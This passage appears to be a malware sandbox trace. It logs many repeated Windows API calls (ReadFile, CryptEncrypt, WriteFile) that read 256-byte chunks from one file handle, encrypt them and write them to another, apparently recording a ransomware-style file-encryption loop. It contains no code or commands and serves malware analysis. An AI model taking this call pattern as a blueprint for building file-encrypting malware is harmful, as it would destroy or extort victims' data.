nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.594] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.595] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.595] GetLastError () returned 0x0 [0152.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.595] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.595] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.595] GetLastError () returned 0x0 [0152.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.595] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.595] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.595] GetLastError () returned 0x0 [0152.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.595] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.595] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.595] GetLastError () returned 0x0 [0152.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.595] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.595] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.595] GetLastError () returned 0x0 [0152.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.595] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.595] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.595] GetLastError () returned 0x0 [0152.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.595] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.596] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.596] GetLastError () returned 0x0 [0152.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.596] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.596] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.596] GetLastError () returned 0x0 [0152.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.596] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.596] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.596] GetLastError () returned 0x0 [0152.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.596] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.596] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.596] GetLastError () returned 0x0 [0152.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.596] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.596] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.596] GetLastError () returned 0x0 [0152.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.596] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.596] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.596] GetLastError () returned 0x0 [0152.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.596] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.596] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.596] GetLastError () returned 0x0 [0152.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.597] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.597] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.597] GetLastError () returned 0x0 [0152.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.597] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.597] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.597] GetLastError () returned 0x0 [0152.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.597] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.597] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.597] GetLastError () returned 0x0 [0152.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.597] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.597] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.597] GetLastError () returned 0x0 [0152.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.597] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.597] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.597] GetLastError () returned 0x0 [0152.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.597] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.597] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.597] GetLastError () returned 0x0 [0152.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.597] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.598] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.598] GetLastError () returned 0x0 [0152.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.598] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.598] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.598] GetLastError () returned 0x0 [0152.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.598] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.598] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.598] GetLastError () returned 0x0 [0152.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.598] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.598] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.598] GetLastError () returned 0x0 [0152.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.598] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.598] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.598] GetLastError () returned 0x0 [0152.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.598] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.598] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.598] GetLastError () returned 0x0 [0152.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.598] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.598] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.598] GetLastError () returned 0x0 [0152.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.599] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.599] GetLastError () returned 0x0 [0152.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.599] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.599] GetLastError () returned 0x0 [0152.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.599] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.599] GetLastError () returned 0x0 [0152.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.599] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.599] GetLastError () returned 0x0 [0152.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.599] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.599] GetLastError () returned 0x0 [0152.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.599] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.599] GetLastError () returned 0x0 [0152.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | 